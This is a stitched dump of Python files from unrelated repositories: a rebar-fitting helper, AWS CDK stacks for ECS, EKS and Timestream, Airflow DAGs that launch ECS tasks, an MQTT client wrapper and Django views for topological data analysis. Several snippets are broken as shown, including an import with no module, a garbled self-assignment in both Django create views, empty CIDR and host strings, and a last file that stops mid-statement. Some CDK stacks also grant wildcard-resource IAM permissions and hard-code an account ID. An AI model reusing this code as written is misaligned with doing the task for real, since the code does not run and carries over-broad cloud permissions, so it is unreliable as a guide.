{ "source": "0916dhkim/SeniorDesign", "score": 3 }
#### File: 0916dhkim/SeniorDesign/ ```python from math import sqrt, pi diameter = {} area = {} min_num = 3 max_num = 11 for ii in range(min_num, 8+1): diameter[ii] = ii/8.000 area[ii] = pi * diameter[ii]**2 / 4 for ii in range(9, max_num+1): area[ii] = ((ii-1)/8) ** 2 diameter[ii] = 2 * sqrt(area[ii]/pi) def fit_bars(area_req, width, aggregate_size): count = {} fail = {'bar': max_num, 'count': 0} # Find the required number of bars to achieve required area. for bar_num in range(min_num, max_num+1): req_num = int(area_req // area[bar_num] + 1) count[bar_num] = req_num # Find the configuration with the least reinforcement area. ret = fail for bar_num in range(min_num, max_num+1): if count[bar_num] < 2: count[bar_num] = 2 if width >= diameter[bar_num]*count[bar_num]+aggregate_size*(count[bar_num]-1): if ret['count'] is 0 or area[ret['bar']]*ret['count'] > area[bar_num]*count[bar_num]: ret = {'bar': bar_num, 'count': count[bar_num]} return ret ```
{ "source": "092975/spykesim", "score": 3 }
#### File: spykesim/spykesim/ ```python import numpy as np from joblib import Parallel, delayed, cpu_count import editsim def su(a,i): return a[i].sum(); def execute(): print("test") dims = (100000,4); x = editsim.createSharedNumpyArray(dims); x[:] = np.random.rand(dims[0], dims[1]); res = Parallel(n_jobs = cpu_count())(delayed(su)(x,i) for i in range(dims[0])); print(res) execute() ```
{ "source": "094459/beltech-multiarchitecture", "score": 2 }
#### File: multi-arch/ecs_anywhere/ ```python from aws_cdk import ( aws_iam as iam, aws_ecs as ecs, aws_ecr as ecr, aws_codecommit as codecommit, aws_codebuild as codebuild, aws_codepipeline as codepipeline, aws_codepipeline_actions as codepipeline_actions, core ) class EcsAnywherePipeStack(core.Stack): def __init__(self, scope: core.Construct, id: str, vpc, props, **kwargs) -> None: super().__init__(scope, id, **kwargs) # This CDK application uses existing ECS Repo and CodeCommit repositories # You can easily change create these using CDK # select ECR ecr_repo = ecr.Repository.from_repository_name(self, "springbootecrrepo", repository_name=f"{props['ecr-repo']}") # select code repo code = codecommit.Repository.from_repository_name(self, "CodeRep", repository_name=f"{props['code-repo']}") codecommit.CfnRepository.CodeProperty.branch_name="main" core.CfnOutput(self,"CodeCommitOutput", value=code.repository_clone_url_http) # create codecommit build steps # the files references are in the code-repo (armbuild/amdbuild/postbuild) # from the root folder in the repository # If you update those (locations/filenames) you will need to update these arm_build = codebuild.PipelineProject(self, "ARMBuild", build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/armbuild.yml"), environment=codebuild.BuildEnvironment( build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_ARM, privileged=True), environment_variables=self.get_build_env_vars(ecr_repo)) self.add_role_access_to_build(arm_build) amd_build = codebuild.PipelineProject(self, "AMDBuild", build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/amdbuild.yml"), environment=codebuild.BuildEnvironment( build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_3, privileged=True), environment_variables=self.get_build_env_vars(ecr_repo)) self.add_role_access_to_build(amd_build) post_build = codebuild.PipelineProject(self, "PostBuild", build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/post_build.yml"), environment=codebuild.BuildEnvironment( build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_3, privileged=True), environment_variables=self.get_build_env_vars(ecr_repo)) self.add_role_access_to_build(post_build) # create pipeline source_output = codepipeline.Artifact() arm_build_output = codepipeline.Artifact("ARMBuildOutput") amd_build_output = codepipeline.Artifact("AMDBuildOutput") post_build_output = codepipeline.Artifact("PostBuildOutput") codepipeline.Pipeline( self, "ECSAnyWherePipeline", pipeline_name="ECSAnyWhere", stages=[ codepipeline.StageProps(stage_name="Source", actions=[ codepipeline_actions.CodeCommitSourceAction( action_name="CodeCommit_Source", repository=code, branch='main', output=source_output)]), codepipeline.StageProps(stage_name="Build", actions=[ codepipeline_actions.CodeBuildAction( action_name="ARM_Build", project=arm_build, input=source_output, outputs=[arm_build_output]), codepipeline_actions.CodeBuildAction( action_name="AMD_Build", project=amd_build, input=source_output, outputs=[amd_build_output]), ]), codepipeline.StageProps(stage_name="PostBuild", actions=[ codepipeline_actions.CodeBuildAction( action_name="Post_Build", project=post_build, input=source_output, outputs=[post_build_output]) ]), ]) def add_role_access_to_build(self, build): build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AmazonEC2ContainerRegistryFullAccess")) build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AmazonSSMReadOnlyAccess")) build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AWSCodeDeployRoleForECS")) build.add_to_role_policy(iam.PolicyStatement(actions=["kms:Decrypt", "kms:GenerateDataKey*"], resources=["*"])) build.add_to_role_policy(iam.PolicyStatement(actions=[ "ec2:DescribeAvailabilityZones", "ecs:DescribeClusters", "ecs:DescribeServices", "ecs:CreateTaskSet", "ecs:UpdateService*", "ecs:DeleteTaskSet", "ssm:PutParameter", "ecs:DescribeTaskDefinition", "ecs:RegisterTaskDefinition"], resources=["*"])) # We need to grab some Parameter Store variables def get_build_env_vars(self, ecr_repo): return { "REPOSITORY_URI": codebuild.BuildEnvironmentVariable(value=ecr_repo.repository_uri), "ECS_CLUSTER": codebuild.BuildEnvironmentVariable( value="/demo/ecsanywhere/clustername", type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE), "ECS_SERVICE": codebuild.BuildEnvironmentVariable( value="/demo/ecsanywhere/servicename", type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE), "ECS_SN": codebuild.BuildEnvironmentVariable( value="/demo/ecsanywhere/shortcn", type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE), } ```
{ "source": "094459/blog-multi-arch-springboot", "score": 2 }
#### File: ecs-anywhere/ecs_anywhere/ ```python from aws_cdk import ( aws_iam as iam, aws_ecs as ecs, aws_ecr as ecr, aws_ec2 as ec2, aws_ssm as ssm, aws_logs as log, aws_autoscaling as autoscaling, aws_elasticloadbalancingv2 as elbv2, core ) from aws_cdk.aws_ecr_assets import DockerImageAsset class EcsAnywhereLBStack(core.Stack): def __init__(self, scope: core.Construct, id: str, vpc, props, **kwargs) -> None: super().__init__(scope, id, **kwargs) # Create Application Load Balancer and Target Group # which configures the target IP of the remote Pi # and sets up the necessary security groups local_lb_security_group = ec2.SecurityGroup( self, "Load Balance internal Springboot http access", vpc=vpc ) local_lb_security_group.add_ingress_rule( ec2.Peer.any_ipv4(), ec2.Port.tcp(80) ) local_lb_security_group.add_egress_rule( ec2.Peer.ipv4(f"{props['mydcinternalcidr']}"), ec2.Port.tcp(8080) ) lb = elbv2.ApplicationLoadBalancer( self, "LB", vpc=vpc, internet_facing=True, security_group=local_lb_security_group ) listener = lb.add_listener( "Listener", port=80, open=True ) remotepi = elbv2.IpTarget( f"{props['home-pi']}", port=8080, availability_zone="all") listener.add_targets( "Target", port=8080, targets=[remotepi] ) core.CfnOutput( self, id="PiRemoteLB", value=lb.load_balancer_dns_name, description="DNS of the Remote Pi Load Balancer" ) ```
{ "source": "094459/blogpost-airflow-hybrid", "score": 2 }
#### File: ecs-cdk/ecs-anywhere/ ```python from aws_cdk import core from ecs_anywhere.ecs_anywhere_vpc import EcsAnywhereVPCStack from ecs_anywhere.ecs_anywhere_taskdef import EcsAnywhereTaskDefStack env_EU=core.Environment(region="eu-west-2", account="704533066374") props = { 'ecsclustername':'hybrid-airflow', 'ecr-repo': 'hybrid-airflow', 'image-tag' : 'airflw', 'awsvpccidr':'', 's3':'ricsue-airflow-hybrid' } app = core.App() mydc_vpc = EcsAnywhereVPCStack( scope=app, id="ecs-anywhere-vpc", env=env_EU, props=props ) mydc_ecs_cicd = EcsAnywhereTaskDefStack( scope=app, id="ecs-anywhere-taskdef", env=env_EU, vpc=mydc_vpc.vpc, props=props ) app.synth() ``` #### File: ecs-anywhere/ecs_anywhere/ ```python from aws_cdk import ( aws_iam as iam, aws_ec2 as ec2, core ) class EcsAnywhereVPCStack(core.Stack): def __init__(self, scope: core.Construct, id: str, props, **kwargs) -> None: super().__init__(scope, id, **kwargs) # Create VPC networking environment # Public subnet/ "private"(isolated) subnet # Customer Gateway and Virtual Private Gateway # Site to Site VPN Connection self.vpc = ec2.Vpc( self, id="mydc-vpn-vpc", cidr=f"{props['awsvpccidr']}", nat_gateways=1, subnet_configuration=[ ec2.SubnetConfiguration( name="public", cidr_mask=24, reserved=False, subnet_type=ec2.SubnetType.PUBLIC), ec2.SubnetConfiguration( name="private", cidr_mask=24, #reserved=False, subnet_type=ec2.SubnetType.ISOLATED) reserved=False, subnet_type=ec2.SubnetType.PRIVATE) ], max_azs=2, enable_dns_hostnames=True, enable_dns_support=True, vpn_gateway=False ) core.CfnOutput( self, id="VPCId", value=self.vpc.vpc_id, description="VPC ID", export_name=f"{self.region}:{self.account}:{self.stack_name}:vpc-id" ) ``` #### File: blogpost-airflow-hybrid/dag/ ```python from airflow import DAG from datetime import datetime, timedelta from airflow.operators.python import PythonOperator import boto3 import json default_args = { 'owner': 'ubuntu', 'start_date': datetime(2019, 8, 14), 'retry_delay': timedelta(seconds=60*60) } # Grab variables - fure improvement #region #taskRoleArn #executionRoleArn #family #awslogs-group #awslogs-stream-prefix #task-name #container-image #command #cluster client = boto3.client("ecs", region_name="eu-west-2") # Function that will take variables and create our new ECS Task Definition def create_task(ti): response = client.register_task_definition( containerDefinitions=[ { "name": "airflow-hybrid-boto3", "image": "", "cpu": 0, "portMappings": [], "essential": True, "environment": [], "mountPoints": [], "volumesFrom": [], "command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"], "logConfiguration": { "logDriver": "awslogs", "options": { "awslogs-group": "/ecs/test-external", "awslogs-region": "eu-west-2", "awslogs-stream-prefix": "ecs" } } } ], taskRoleArn="arn:aws:iam::xxx:role/ecsTaskExecutionRole", executionRoleArn="arn:aws:iam::xxxx:role/ecsTaskExecutionRole", family= "test-external", networkMode="bridge", requiresCompatibilities= [ "EXTERNAL" ], cpu= "256", memory= "512") # we now need to store the version of the new task so we can ensure idemopotency new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str) print("TaskDef is now at :" + str(new_taskdef)) return new_taskdef # Function that will run our ECS Task def run_task(ti): #new_taskdef=ti.xcom_pull(key='new_taskdef', task_ids=['create_taskdef'][0]) new_taskdef=ti.xcom_pull(task_ids=['create_taskdef'][0]) print("TaskDef passed is :" + str(new_taskdef)) response2 = client.run_task( cluster='test-hybrid', count=1, launchType='EXTERNAL', taskDefinition='test-external:{taskdef}'.format(taskdef=new_taskdef) ) with DAG('airflow_ecsanywhere_boto3', catchup=False, default_args=default_args, schedule_interval=None) as dag: first_task=PythonOperator(task_id='create_taskdef', python_callable=create_task, provide_context=True, dag=dag) second_task=PythonOperator(task_id='run_task', python_callable=run_task, provide_context=True, dag=dag) first_task >> second_task ``` #### File: blogpost-airflow-hybrid/dag/ ```python from airflow import DAG from datetime import datetime, timedelta from import ECSOperator from airflow.operators.python import PythonOperator import boto3 import json default_args = { 'owner': 'ubuntu', 'start_date': datetime(2019, 8, 14), 'retry_delay': timedelta(seconds=60*60) } # Function that will take variables and create our new ECS Task Definition def create_task(ti): client = boto3.client("ecs", region_name="eu-west-2") response = client.register_task_definition( containerDefinitions=[ { "name": "airflow-hybrid-demo", "image": "", "cpu": 0, "portMappings": [], "essential": True, "environment": [], "mountPoints": [], "volumesFrom": [], "command": ["ricsue-airflow-hybrid","period1/hq-data.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"], "logConfiguration": { "logDriver": "awslogs", "options": { "awslogs-group": "/ecs/test-external", "awslogs-region": "eu-west-2", "awslogs-stream-prefix": "ecs" } } } ], taskRoleArn="arn:aws:iam::xx:role/ecsTaskExecutionRole", executionRoleArn="arn:aws:iam::xx:role/ecsTaskExecutionRole", family= "test-external", networkMode="host", requiresCompatibilities= [ "EXTERNAL" ], cpu= "256", memory= "512") # we now need to store the version of the new task so we can ensure idemopotency new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str) print("TaskDef is now at :" + str(new_taskdef)) return new_taskdef with DAG('hybrid_airflow_dag_test', catchup=False, default_args=default_args, schedule_interval=None) as dag: create_taskdef = PythonOperator( task_id='create_taskdef', provide_context=True, python_callable=create_task, dag=dag ) cloudquery = ECSOperator( task_id="cloudquery", dag=dag, cluster="test-hybrid", task_definition="test-external", overrides={ }, launch_type="EC2", awslogs_group="/ecs/test-external", awslogs_stream_prefix="ecs" ) # switch between these to change between remote and local MySQL # "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from customers WHERE location = \"Poland\"", "rds-airflow-hybrid","eu-west-2" ]} # "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from regionalcustomers WHERE country = \"Poland\"", "localmysql-airflow-hybrid","eu-west-2" ]} remotequery = ECSOperator( task_id="remotequery", dag=dag, cluster="test-hybrid", task_definition="test-external", launch_type="EXTERNAL", overrides={ "containerOverrides": [ { "name": "airflow-hybrid-demo", "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from regionalcustomers WHERE country = \"Poland\"", "localmysql-airflow-hybrid","eu-west-2" ]} ] }, awslogs_group="/ecs/test-external", awslogs_stream_prefix="ecs", ) create_taskdef >> cloudquery create_taskdef >> remotequery ``` #### File: docker/app/ ```python import boto3 import json def get_secret(): secret_name = "rds-airflow-hybrid" region_name = "eu-west-2" # Create a Secrets Manager client session = boto3.session.Session() client = session.client( service_name='secretsmanager', region_name=region_name ) get_secret_value_response = client.get_secret_value(SecretId=secret_name) info=json.loads(get_secret_value_response['SecretString']) pw=info['password'] un=info['username'] hs=info['host'] db=info['database'] get_secret() ``` #### File: blogpost-airflow-hybrid/scripts/ ```python import boto3 import json client = boto3.client("ecs", region_name="eu-west-2") def create_task(): response = client.register_task_definition( containerDefinitions=[ { "name": "airflow-hybrid-boto3", "image": "", "cpu": 0, "portMappings": [], "essential": True, "environment": [], "mountPoints": [], "volumesFrom": [], "command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"], "logConfiguration": { "logDriver": "awslogs", "options": { "awslogs-group": "/ecs/test-external", "awslogs-region": "eu-west-2", "awslogs-stream-prefix": "ecs" } } } ], taskRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole", executionRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole", family= "test-external", networkMode="HOST", requiresCompatibilities= [ "EXTERNAL" ], cpu= "256", memory= "512") ```
{ "source": "094459/dev-con", "score": 2 }
#### File: mwaa-redshift/mwaa_redshift/ ```python from aws_cdk import core import aws_cdk.aws_ec2 as ec2 class MwaaRedshiftVPC(core.Stack): def __init__(self, scope: core.Construct, id: str, props, **kwargs) -> None: super().__init__(scope, id, **kwargs) # Create VPC network self.vpc = ec2.Vpc( self, id="MWAA-RedShiftCluster-VPC", cidr="", nat_gateways=1, subnet_configuration=[ ec2.SubnetConfiguration( name="public", cidr_mask=20, reserved=False, subnet_type=ec2.SubnetType.PUBLIC), ec2.SubnetConfiguration( name="private", cidr_mask=20, reserved=False, subnet_type=ec2.SubnetType.PRIVATE) ], max_azs=2, enable_dns_hostnames=True, enable_dns_support=True ) core.CfnOutput( self, id="VPCId", value=self.vpc.vpc_id, description="VPC ID", export_name=f"{self.region}:{self.account}:{self.stack_name}:vpc-id" ) ```
{ "source": "094459/devday-graviton", "score": 2 }
#### File: cdk/backend/ ```python from aws_cdk import (core, aws_lambda as lambda_, aws_s3 as s3, aws_eks as eks, aws_iam as iam, aws_ec2 as ec2) import json class BackendStack(core.Stack): def __init__(self, scope: core.Construct, id: str, **kwargs) -> None: super().__init__(scope, id, **kwargs) # create new vpc vpc = ec2.Vpc(self, "VPC") # create eks self.eks = self.create_eks(vpc) def create_eks(self, vpc): # create eks cluster with amd nodegroup cluster = eks.Cluster(self, "EKS", vpc=vpc, version=eks.KubernetesVersion.V1_18, default_capacity_instance=ec2.InstanceType("m5.large"), default_capacity=1) # add arm/graviton nodegroup cluster.add_nodegroup_capacity("graviton", desired_size=1, instance_type=ec2.InstanceType("m6g.large"), nodegroup_name="graviton", node_role=cluster.default_nodegroup.role) # add secret access to eks node role cluster.default_nodegroup.role.add_managed_policy( iam.ManagedPolicy.from_aws_managed_policy_name("SecretsManagerReadWrite")) # create service account sa = self.add_service_account(cluster=cluster, name="aws-load-balancer-controller", namespace="kube-system") # add helm charts ingress = cluster.add_helm_chart("LBIngress", chart="aws-load-balancer-controller", release="aws-load-balancer-controller", repository="", namespace="kube-system", values={ "clusterName": cluster.cluster_name, "": "aws-load-balancer-controller", "serviceAccount.create": "false" }) return cluster def add_service_account(self, cluster, name, namespace): """ workaround to add helm role to service account """ # create role conditions = core.CfnJson(self, 'ConditionJson', value = { "%s:aud" % cluster.cluster_open_id_connect_issuer : "", "%s:sub" % cluster.cluster_open_id_connect_issuer : "system:serviceaccount:%s:%s" % (namespace, name), }, ) principal = iam.OpenIdConnectPrincipal(cluster.open_id_connect_provider).with_conditions({ "StringEquals": conditions, }) role = iam.Role(self, 'ServiceAccountRole', assumed_by=principal) # create policy for the service account statements = [] with open('backend/iam_policy.json') as f: data = json.load(f) for s in data["Statement"]: statements.append(iam.PolicyStatement.from_json(s)) policy = iam.Policy(self, "LBControllerPolicy", statements=statements) policy.attach_to_role(role) return eks.KubernetesManifest(self, "ServiceAccount", cluster=cluster, manifest=[{ "apiVersion": "v1", "kind": "ServiceAccount", "metadata": { "name": name, "namespace": namespace , "labels": { "": name, "": "Helm", }, "annotations": { "": role.role_arn, "": name, "": namespace, }, }, }], ); ```
{ "source": "094459/time-series-and-data-lakes", "score": 2 }
#### File: cdk/from_kds_to_timestream/ ```python from aws_cdk import ( aws_iam as iam, aws_kinesis as kinesis, aws_lambda as lambda_, aws_lambda_event_sources as lambda_event_sources, aws_timestream as timestream, core ) class FromKdsToTimestream(core.Construct): def __init__(self, scope: core.Construct, construct_id: str, stream: kinesis.Stream, ts_db: timestream.CfnDatabase, ts_table: timestream.CfnTable, **kwargs) -> None: super().__init__(scope, construct_id, **kwargs) # Load all records in the Input Stream into the Raw Time Series Table - AWS Lambda Function load_data_fn = lambda_.Function( self, "LoadRawDataFn", runtime=lambda_.Runtime.PYTHON_3_8, code=lambda_.Code.from_asset("load_data_fn"), handler="app.lambda_handler", environment={ "TIMESTREAM_DATABASE": ts_db.ref, "TIMESTREAM_TABLE": ts_table.attr_name } ) # Lambda Function permission to write to the Raw Time Series Table load_data_fn.add_to_role_policy( iam.PolicyStatement( actions=[ "timestream:WriteRecords", ], effect=iam.Effect.ALLOW, resources=[ f"{ts_table.attr_arn}" ], ) ) # Lambda function permissions to describe Timestream endpoints load_data_fn.add_to_role_policy( iam.PolicyStatement( actions=[ "timestream:DescribeEndpoints" ], effect=iam.Effect.ALLOW, resources=["*"], ) ) # To send Input Stream records to the Lambda function load_data_fn.add_event_source( lambda_event_sources.KinesisEventSource( stream, starting_position=lambda_.StartingPosition.TRIM_HORIZON, retry_attempts=2 ) ) ``` #### File: tests/unit/ ```python import json import pytest from aws_cdk import core from time_series_and_data_lakes.time_series_and_data_lakes_stack import TimeSeriesAndDataLakesStack def get_template(): app = core.App() TimeSeriesAndDataLakesStack(app, "time-series-and-data-lakes") return json.dumps(app.synth().get_stack("time-series-and-data-lakes").template) def test_sqs_queue_created(): assert("AWS::SQS::Queue" in get_template()) def test_sns_topic_created(): assert("AWS::SNS::Topic" in get_template()) ``` #### File: mwaa-cdk/mwaa_cdk/ ```python from aws_cdk import core import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3_deployment as s3deploy import aws_cdk.aws_iam as iam class MwaaCdkStackDeployFiles(core.Stack): def __init__(self, scope: core.Construct, id: str, vpc, mwaa_props, **kwargs) -> None: super().__init__(scope, id, **kwargs) # Create MWAA S3 Bucket and upload local dags dags_bucket = s3.Bucket( self, "mwaa-dags", bucket_name=f"{mwaa_props['dagss3location'].lower()}", versioned=True, block_public_access=s3.BlockPublicAccess.BLOCK_ALL ) dags = s3deploy.BucketDeployment(self, "DeployDAG", sources=[s3deploy.Source.asset("./dags")], destination_bucket=dags_bucket, destination_key_prefix="dags", prune=False, retain_on_delete=False ) # This uploads a requirements.txt file in the requirements # folder. If not needed, you can comment this out dagreqs = s3deploy.BucketDeployment(self, "DeployRequirements", sources=[s3deploy.Source.asset("./requirements")], destination_bucket=dags_bucket, destination_key_prefix="requirements", prune=False, retain_on_delete=False ) ```
{ "source": "0954517662/NEWPY", "score": 3 }
#### File: NEWPY/build/ ```python import antolib.AntoCommon import paho.mqtt.client as mqtt client = mqtt.Client() class Anto(): def __init__(self, user, key, thing): self.user = user self.key = key self.thing = thing self.mqtt = Mqtt(user, key, thing) client.username_pw_set(self.user, self.key) client.connect('', 1883, 60) #print('Created anto object!') def getVersion(self): return AntoCommon.ANTO_VER def sub(self, channel): #print('Subscribed to: %s' % channel) client.subscribe('channel/%s/%s/%s' % (self.user, self.thing, channel)) def pub(self, channel, msg): print(('Publish \'' + str(msg) + '\' to: ' + str(channel))) client.publish('channel/%s/%s/%s' % (self.user, self.thing, channel), msg) def loop(self, loopFunction): client.loop_start() while(1): loopFunction() class Mqtt(): def __init__(self, user, key, thing): self.user = user self.key = key self.thing = thing def connect(self): if hasattr(self, 'onConnectedCB'): client.on_connect = self.onConnect if hasattr(self, 'onDisconnectedCB'): client.on_disconnect = self.onDisconnectedCB if hasattr(self, 'onPublishedCB'): client.on_publish = self.onPublishedCB if hasattr(self, 'onDataCB'): client.on_message = self.on_message client.username_pw_set(self.user, self.key) client.connect('', 1883, 60) #print('Connected!') def onConnect(self, client, userdata, flags, rc): self.onConnectedCB() def onConnected(self, callback): self.onConnectedCB = callback def onDisconnected(self, callback): self.onDisconnectedCB = callback def onData(self, callback): self.onDataCB = callback def on_message(self, mosq, obj, msg): topic = msg.topic.split('/')[3] # send topic and msg to callback self.onDataCB(topic, msg.payload) def onPublished(self, callback): self.onPublishedCB = callback ```
{ "source": "097475/hansberger", "score": 2 }
#### File: hansberger/analysis/ ```python import numpy import json from itertools import chain from django.shortcuts import redirect from django.http import HttpResponse from django_downloadview import VirtualDownloadView from django.core.files.base import ContentFile from django.shortcuts import get_object_or_404, render from django.urls import reverse_lazy from django.db.transaction import non_atomic_requests from django.utils.decorators import method_decorator from django.views.generic import ( View, CreateView, DeleteView, DetailView, ListView, ) from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger from .models import ( Analysis, FiltrationAnalysis, MapperAnalysis, Window, FiltrationWindow, MapperWindow, Bottleneck, ) from research.models import Research from .forms import ( SourceChoiceForm, FiltrationAnalysisCreationForm_Dataset, FiltrationAnalysisCreationForm_Precomputed, MapperAnalysisCreationForm_Dataset, MapperAnalysisCreationForm_Precomputed, AnalysisBottleneckCreationForm, WindowBottleneckCreationForm ) form_dict = { 'filtration_analysis': { 'precomputed': FiltrationAnalysisCreationForm_Precomputed, 'dataset': FiltrationAnalysisCreationForm_Dataset }, 'mapper_analysis': { 'precomputed': MapperAnalysisCreationForm_Precomputed, 'dataset': MapperAnalysisCreationForm_Dataset } } def SourceChoice(request, research_slug): research = get_object_or_404(Research, slug=research_slug) # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = SourceChoiceForm(request.POST) # check whether it's valid: if form.is_valid(): cleaned_data = form.cleaned_data analysis = cleaned_data.get("analysis") source = cleaned_data.get("source") if analysis == 'filtration_analysis': return redirect('analysis:filtrationanalysis-create', form=source, research_slug=research.slug) elif analysis == 'mapper_analysis': return redirect('analysis:mapperanalysis-create', form=source, research_slug=research.slug) # if a GET (or any other method) we'll create a blank form else: form = SourceChoiceForm() return render(request, 'analysis/analysis_source_choice.html', {'form': form, 'research': research}) class AnalysisDetailView(View): def get(self, request, *args, **kwargs): my_analysis = (FiltrationAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first() or MapperAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first()) if isinstance(my_analysis, FiltrationAnalysis): return render(request, 'analysis/filtrationanalysis_detail.html', context={'analysis': my_analysis, 'homology': range(my_analysis.max_homology_dimension + 1)}) elif isinstance(my_analysis, MapperAnalysis): return render(request, 'analysis/mapperanalysis_detail.html', context={'analysis': my_analysis}) class AnalysisDeleteView(DeleteView): model = Analysis context_object_name = 'analysis' template_name = "analysis/analysis_confirm_delete.html" def get_object(self): return (FiltrationAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first() or MapperAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first()) def get_success_url(self): return reverse_lazy('analysis:analysis-list', kwargs={ 'research_slug': self.kwargs['research_slug'] }) class AnalysisListView(ListView): model = Analysis context_object_name = 'analyses' paginate_by = 10 template_name = "analysis/analysis_list.html" def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context['research'] = self.research return context def get_queryset(self): self.research = get_object_or_404( Research, slug=self.kwargs['research_slug'] ) filtration_analyses = FiltrationAnalysis.objects.filter( research=self.research ).only('name', 'creation_date', 'slug', 'research') mapper_analyses = MapperAnalysis.objects.filter( research=self.research ).only('name', 'creation_date', 'slug', 'research') return sorted(chain(filtration_analyses, mapper_analyses), key=lambda x: x.creation_date, reverse=True) @method_decorator(non_atomic_requests, name='dispatch') class FiltrationAnalysisCreateView(CreateView): model = FiltrationAnalysis def get_template_names(self): print(self.get_form_class()) if self.get_form_class() is FiltrationAnalysisCreationForm_Dataset: return "analysis/filtrationanalysis_dataset_form.html" elif self.get_form_class() is FiltrationAnalysisCreationForm_Precomputed: return "analysis/filtrationanalysis_precomputed_form.html" def get_form_class(self): return form_dict['filtration_analysis'][self.kwargs['form']] def get_success_url(self): return reverse_lazy('analysis:analysis-detail', kwargs={ 'research_slug': self.kwargs['research_slug'], 'analysis_slug': self.analysis.slug }) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context['research'] = self.research return context def get_form_kwargs(self): kwargs = super().get_form_kwargs() self.research = get_object_or_404( Research, slug=self.kwargs['research_slug'] ) kwargs['research'] = self.research return kwargs def form_valid(self, form): self.analysis = self.analysis.precomputed_distance_matrix_json = self.precomputed_distance_matrix_json return super().form_valid(form) def post(self, request, *args, **kwargs): self.object = None form_class = self.get_form_class() form = self.get_form(form_class) files = request.FILES.getlist('precomputed_distance_matrix') if form.is_valid(): precomputed_distance_matrixes = [] for f in sorted(files): precomputed_distance_matrixes.append(numpy.loadtxt(f).tolist()) self.precomputed_distance_matrix_json = json.dumps(precomputed_distance_matrixes) return self.form_valid(form) else: return self.form_invalid(form) @method_decorator(non_atomic_requests, name='dispatch') class MapperAnalysisCreateView(CreateView): model = MapperAnalysis def get_template_names(self): if self.get_form_class() is MapperAnalysisCreationForm_Dataset: return "analysis/mapperanalysis_dataset_form.html" elif self.get_form_class() is MapperAnalysisCreationForm_Precomputed: return "analysis/mapperanalysis_precomputed_form.html" def get_form_class(self): return form_dict['mapper_analysis'][self.kwargs['form']] def get_success_url(self): return reverse_lazy('analysis:analysis-detail', kwargs={ 'research_slug': self.kwargs['research_slug'], 'analysis_slug': self.analysis.slug }) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context['research'] = self.research return context def get_form_kwargs(self): kwargs = super().get_form_kwargs() self.research = get_object_or_404( Research, slug=self.kwargs['research_slug'] ) kwargs['research'] = self.research return kwargs def form_valid(self, form): self.analysis = self.analysis.precomputed_distance_matrix_json = self.precomputed_distance_matrix_json return super().form_valid(form) def post(self, request, *args, **kwargs): self.object = None form_class = self.get_form_class() form = self.get_form(form_class) files = request.FILES.getlist('precomputed_distance_matrix') if form.is_valid(): precomputed_distance_matrixes = [] for f in files: precomputed_distance_matrixes.append(numpy.loadtxt(f).tolist()) self.precomputed_distance_matrix_json = json.dumps(precomputed_distance_matrixes) return self.form_valid(form) else: return self.form_invalid(form) class MapperAnalysisView(View): def get(self, request, *args, **kwargs): my_analysis = get_object_or_404( MapperAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) my_window = get_object_or_404( MapperWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) return HttpResponse(my_window.graph) class WindowDetailView(DetailView): def get(self, request, *args, **kwargs): my_analysis = (FiltrationAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first() or MapperAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first()) if type(my_analysis) is FiltrationAnalysis: my_window = get_object_or_404( FiltrationWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) elif type(my_analysis) is MapperAnalysis: my_window = get_object_or_404( MapperWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) if isinstance(my_window, FiltrationWindow): return render(request, 'analysis/window/filtrationwindow_detail.html', context={'window': my_window, 'homology': range(my_analysis.max_homology_dimension + 1)}) elif isinstance(my_window, MapperWindow): return render(request, 'analysis/window/mapperwindow_detail.html', context={'window': my_window}) class WindowListView(ListView): model = Window context_object_name = 'windows' paginate_by = 10 template_name = "analysis/window/window_list.html" def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context['analysis'] = self.analysis return context def get_queryset(self): self.analysis = (FiltrationAnalysis.objects.filter( research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first() or MapperAnalysis.objects.filter( 